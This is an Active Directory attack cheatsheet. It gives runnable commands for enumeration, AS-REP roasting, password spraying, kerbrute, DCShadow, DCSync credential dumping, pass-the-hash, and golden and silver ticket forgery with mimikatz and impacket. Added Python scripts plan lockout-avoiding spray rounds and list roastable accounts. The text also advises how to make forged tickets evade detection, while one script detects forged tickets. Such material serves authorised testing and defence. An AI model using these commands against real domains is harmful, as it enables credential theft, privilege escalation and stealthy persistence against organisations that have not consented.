AD Related

Enumeration

Basic LDAP enumeration (enum4linux-ng covers SMB/RPC and LDAP; windapsearch and ad-ldap-enum query LDAP with domain credentials)

python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -u morph3 -p Password123
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

LDAP Queries

Get all the users (Get-ADUser only returns user objects; with raw LDAP, (objectClass=user) also matches computer accounts, so use (&(objectCategory=person)(objectClass=user)) there)

Get-ADUser -LDAPFilter "(objectClass=user)"

Dump the whole directory over LDAPS (LDAPTLS_REQCERT=never disables certificate validation, acceptable for a lab DC with a self-signed certificate)

export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar

AS-Rep Roasting

If a user has Kerberos pre-authentication disabled (DONT_REQ_PREAUTH set in userAccountControl), the KDC returns an AS-REP for that account without any password, and the part encrypted under the user's key can be cracked offline (hashcat mode 18200):

impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
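The roastable accounts are the ones with DONT_REQ_PREAUTH set and ACCOUNTDISABLE clear in userAccountControl. The Python below is an added example (not part of the original cheatsheet or of impacket): it parses LDIF of the kind the ldapsearch command in the LDAP section writes, decodes userAccountControl, emits the usernames in the one-per-line format GetNPUsers -usersfile expects, and also carries the equivalent server-side LDAP filter. The LDIF, account names and UAC values are constructed.

```python
"""List AS-REP roastable accounts from an LDAP dump.

Added example, not part of the original cheatsheet. It parses LDIF as
written by ldapsearch, decodes userAccountControl and keeps accounts with
DONT_REQ_PREAUTH set and ACCOUNTDISABLE clear, which is what GetNPUsers
roasts. Output is one sAMAccountName per line for -usersfile. The LDIF
below is constructed sample data.
"""
from __future__ import annotations

import base64
import re

# userAccountControl bits (MS-SAMR); the two marked are the ones that matter here.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",        # a disabled account cannot be roasted
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",    # the AS-REP roasting precondition
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Same selection done server-side; 1.2.840.113556.1.4.803 is the bitwise-AND matching rule.
ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH})"
    f"(!(userAccountControl:1.2.840.113556.1.4.803:={ACCOUNTDISABLE})))"
)

LDIF_LINE = re.compile(r"^([A-Za-z][\w;.-]*):(:?) ?(.*)$")


def decode_uac(value: int) -> list[str]:
    """Names of every set userAccountControl bit, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_ldif(text: str) -> list[dict[str, str]]:
    """Split LDIF into entries. Folded lines (leading space) are rejoined and
    '::' values are base64-decoded. Multi-valued attributes keep the last
    value, which is fine for the single-valued attributes used here."""
    entries: list[dict[str, str]] = []
    current: dict[str, str] = {}
    for line in re.sub(r"\n ", "", text).splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        m = LDIF_LINE.match(line)
        if line.startswith("#") or not m:
            continue
        attr, is_b64, value = m.groups()
        if is_b64:
            value = base64.b64decode(value).decode("utf-8", "replace")
        current[attr] = value
    if current:
        entries.append(current)
    return entries


def roastable_users(ldif: str) -> list[str]:
    """sAMAccountNames with pre-auth disabled and the account still enabled."""
    users = []
    for entry in parse_ldif(ldif):
        uac = int(entry.get("userAccountControl", "0"))
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE and "sAMAccountName" in entry:
            users.append(entry["sAMAccountName"])
    return users


# Constructed sample: one roastable user, one ordinary service account,
# one roastable-but-disabled account and one computer object.
SAMPLE_LDIF = """\
dn: CN=morph3,OU=Users,DC=ecorp,DC=local
objectClass: user
sAMAccountName: morph3
userAccountControl: 4260352

dn: CN=svc_backup,OU=Service Accounts,DC=ecorp,DC=local
objectClass: user
sAMAccountName: svc_backup
userAccountControl: 66048

dn: CN=old_admin,OU=Users,DC=ecorp,DC=local
objectClass: user
sAMAccountName: old_admin
userAccountControl: 4194818

dn: CN=WS01,CN=Computers,DC=ecorp,DC=local
objectClass: computer
sAMAccountName: WS01$
userAccountControl: 4096
"""

if __name__ == "__main__":
    print("LDAP filter:", ROASTABLE_FILTER)
    for entry in parse_ldif(SAMPLE_LDIF):
        print(entry["sAMAccountName"], decode_uac(int(entry["userAccountControl"])))
    print("\n".join(roastable_users(SAMPLE_LDIF)))   # this is the -usersfile content
```

Run it against a real dump with `ldapsearch ... '(objectClass=user)' sAMAccountName userAccountControl > users.ldif` and pass the output to GetNPUsers; the filter constant can be given to ldapsearch directly to let the DC do the selection.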

Bruteforcing - Password Spraying

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

Kerbrute

Kerberos (port 88) bruteforcing. Failed pre-authentication is logged on the DC as event 4771, not as a 4625 logon failure; userenum only probes whether a principal exists and leaves nothing behind unless Kerberos Authentication Service auditing is enabled.

# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
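Both DomainPasswordSpray and kerbrute passwordspray try one password against every user per round, so each round costs every account one bad-password count, and that count only resets after the lockout observation window has elapsed since the last failure. The Python below is an added example (not part of the original cheatsheet or of either tool): it reads the policy from the output of `net accounts /domain` and splits a password list into rounds that keep every account under the threshold, with the wait needed between rounds. The `net accounts` text and the password list are constructed; the en-US output layout is assumed.

```python
"""Lockout-aware password spray schedule.

Added example, not part of the original cheatsheet. Reads the domain
lockout policy from `net accounts /domain` output (constructed sample
below) and groups passwords into rounds so that no account reaches the
lockout threshold, telling you how long to wait between rounds.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int        # bad passwords before lockout; 0 = never locks out
    window_minutes: int   # minutes after a failure before badPwdCount resets


# Constructed `net accounts /domain` output in the layout the real command prints.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""


def parse_net_accounts(text: str) -> LockoutPolicy:
    """Extract threshold and observation window; 'Never' means lockout is off."""
    thr = re.search(r"Lockout threshold:\s+(\S+)", text)
    win = re.search(r"Lockout observation window \(minutes\):\s+(\d+)", text)
    if not thr or not win:
        raise ValueError("lockout policy lines not found in net accounts output")
    threshold = 0 if thr.group(1).lower() == "never" else int(thr.group(1))
    return LockoutPolicy(threshold, int(win.group(1)))


def plan_spray(passwords: list[str], policy: LockoutPolicy,
               safety_margin: int = 2) -> list[tuple[list[str], int]]:
    """Group passwords into rounds of at most (threshold - safety_margin).

    Returns [(passwords_for_this_round, minutes_to_wait_before_next_round)].
    The margin leaves room for failures you cannot see: users mistyping
    their own password, or stale sessions retrying an old one. Because the
    window counts from the last failure, the wait after a round is the
    full window, not the window minus the time the round took.
    """
    if policy.threshold == 0:
        return [(list(passwords), 0)]          # no lockout policy: one round
    per_round = policy.threshold - safety_margin
    if per_round < 1:
        raise ValueError(f"threshold {policy.threshold} leaves no safe attempts")
    rounds = []
    for i in range(0, len(passwords), per_round):
        chunk = passwords[i:i + per_round]
        is_last = i + per_round >= len(passwords)
        rounds.append((chunk, 0 if is_last else policy.window_minutes))
    return rounds


def total_minutes(rounds: list[tuple[list[str], int]]) -> int:
    """Wall-clock waiting the plan needs, not counting the sprays themselves."""
    return sum(wait for _, wait in rounds)


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    plan = plan_spray(["Password1", "Summer2024!", "Welcome1", "Spring2024!", "Company123"], policy)
    for n, (chunk, wait) in enumerate(plan, 1):
        print(f"round {n}: {chunk} then wait {wait} min")   # write each chunk to its own passlist
    print(f"total wait: {total_minutes(plan)} min")
```

Each round's chunk becomes the password list for one DomainPasswordSpray or kerbrute run; fine-grained password policies (PSOs) can set a stricter threshold for specific groups than `net accounts` shows, so check those too before spraying privileged users.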

DC Shadow

-This is a persistence attack-

DCShadow registers a rogue Domain Controller in the AD configuration and uses normal replication to push attacker-chosen attribute changes into a legitimate DC. Because the change arrives through replication rather than an LDAP write, it does not produce the usual directory-service change audit events on the target DC. Here it is used to write a privileged SID into an account's SIDHistory. It needs Domain Admin (or equivalent) rights plus SYSTEM on the machine acting as the rogue DC, so it is for keeping access, not gaining it.

Find the SID of the account whose privileges you want to inherit (here the domain Administrator); it goes into /value below

wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid

From a mimikatz running as SYSTEM: this registers the rogue DC and starts an RPC server that waits for the replication request

lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:<administrator_sid>

From a second mimikatz instance running as a Domain Admin, trigger the replication

lsadump::dcshadow /push

/push also unregisters the rogue DC once the change has replicated. Log off and back on so the new SIDHistory ends up in your token, then DCSync

lsadump::dcsync /domain:ECORP.local /account:krbtgt

DC Sync

Using mimikatz,

lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt

Using Invoke-DCSync.ps1,

https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"

Using impacket's secretsdump (-just-dc pulls only the NTDS secrets over DRSUAPI, skipping SAM and LSA),

# with the DC computer account's hash (pass-the-hash)
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
# offline, from a copied SYSTEM hive and ntds.dit
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
# with a privileged user's password (prompted)
impacket-secretsdump morph3@10.11.1.75

Domain Trust

Get-DomainTrustMapping

Get the current (child) domain SID and the target (parent) domain SID with Get-DomainSID. The forged TGT carries the parent's Enterprise Admins SID (<target_domain_sid>-519) in its SIDHistory; this works across parent/child trusts inside a forest because SID filtering is not enforced there

kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid>-519 /ptt

Golden Ticket

With the krbtgt account's NT hash (or AES key) you can forge a TGT for any user with any group membership: the KDC trusts whatever is encrypted under that key.

Get krbtgt hash,

lsadump::dcsync /all /csv

Alternatively, on the DC itself, patch LSASS and read the hashes directly (lsadump::trust also gives the trust keys used for inter-realm tickets)

lsadump::lsa /patch
lsadump::trust /patch

Forging the ticket

  • /rc4 or /krbtgt -> the krbtgt NT hash (/aes256 takes the AES-256 key instead)

  • /sid -> the domain SID, from Get-DomainSID

  • /id -> RID of the user being impersonated, default 500 (Administrator)

  • /ticket -> optional, file to write the ticket to, default ticket.kirbi

  • /groups -> optional, group RIDs placed in the PAC, default 513,512,520,518,519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins)

  • /ptt -> inject the ticket into the current session instead of writing it to a file

kerberos::golden /user:morph3 /domain:evil.corp /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:ticket.kirbi /groups:513,512,520,518,519
kerberos::ptt ticket.kirbi

With /ticket the forged TGT is written to the file and kerberos::ptt loads it into the current logon session (/ptt does both in one step). Confirm it is in the cache:

klist

Then use it against the DC. Address the DC by hostname, not IP: Kerberos needs a name to build the SPN, and an IP makes Windows fall back to NTLM, bypassing the forged ticket.

dir \\DC\C$
psexec.exe \\DC cmd.exe
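klist shows what a defender on the host sees too. kerberos::golden issues a ticket valid for 10 years unless /endin is given, while a DC honours the domain Kerberos policy (10 hours for a TGT by default), and a ticket injected with ptt was never requested from a KDC. The Python below is an added example (not part of the original cheatsheet or of mimikatz): it parses Windows `klist` output, computes each ticket's lifetime and flags tickets that exceed the policy or TGTs with an empty "Kdc Called". The klist text is constructed to show one forged TGT next to one legitimately issued service ticket; the en-US date layout is assumed.

```python
"""Check cached Kerberos tickets for signs of forgery.

Added example, not part of the original cheatsheet. Parses Windows
`klist` output (constructed sample below), computes each ticket's
lifetime from Start Time / End Time and flags tickets that exceed the
domain's maximum TGT lifetime, or TGTs that show no KDC contacted.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for user ticket"

SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7c5

Cached Tickets: (2)

#0>     Client: morph3 @ EVIL.CORP
        Server: krbtgt/EVIL.CORP @ EVIL.CORP
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 5/20/2024 9:12:31 (local)
        End Time:   5/18/2034 9:12:31 (local)
        Renew Time: 5/18/2034 9:12:31 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: morph3 @ EVIL.CORP
        Server: cifs/dc.evil.corp @ EVIL.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 5/20/2024 9:12:40 (local)
        End Time:   5/20/2024 19:12:31 (local)
        Renew Time: 5/27/2024 9:12:31 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: dc.evil.corp
"""

FIELDS = ("Client", "Server", "KerbTicket Encryption Type",
          "Start Time", "End Time", "Renew Time", "Kdc Called")


def parse_klist(text: str) -> list[dict[str, str]]:
    """One dict per '#n>' ticket block; fields that are absent become ''."""
    tickets = []
    for block in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        t = {}
        for key in FIELDS:
            # [ \t]* rather than \s*, so an empty "Kdc Called:" does not swallow the next line
            m = re.search(rf"{re.escape(key)}:[ \t]*(.*)", block)
            t[key] = m.group(1).strip() if m else ""
        tickets.append(t)
    return tickets


def parse_time(value: str) -> datetime:
    """klist prints M/D/YYYY H:MM:SS in local time (en-US layout assumed here)."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def suspicious_tickets(text: str, max_lifetime: timedelta = MAX_TGT_LIFETIME) -> list[tuple[str, list[str]]]:
    """(server, reasons) for every cached ticket that does not look KDC-issued."""
    findings = []
    for t in parse_klist(text):
        reasons = []
        lifetime = parse_time(t["End Time"]) - parse_time(t["Start Time"])
        if lifetime > max_lifetime:
            reasons.append(f"lifetime {lifetime.days} days exceeds policy of {max_lifetime}")
        if t["Server"].lower().startswith("krbtgt/") and not t["Kdc Called"]:
            reasons.append("TGT present but no KDC was contacted to obtain it")
        if reasons:
            findings.append((t["Server"], reasons))
    return findings


if __name__ == "__main__":
    for server, reasons in suspicious_tickets(SAMPLE_KLIST):
        print(server)
        for r in reasons:
            print("  -", r)
```

If you want the forged ticket to blend in, set /startoffset, /endin and /renewmax to match the domain policy and use /aes256 instead of the NT hash; the encryption type column in the sample is the other giveaway, RC4 for the forged TGT against AES for everything the DC issued.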

Purge the cache when you are done

kerberos::purge

If you want to use Metasploit, the equivalent post module is

post/windows/escalate/golden_ticket

Silver Ticket

Same idea as a golden ticket, but forged with a service account's key (NT hash or AES key) instead of krbtgt's. The result is a service ticket (TGS), valid only for that account's SPNs, and since most services do not ask the DC to validate the PAC the forged ticket is never seen by the KDC.

With impacket's ticketer (ksimpson is the user to impersonate, -nthash is the service account's NT hash, and -spn fixes which service accepts the ticket),

python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05
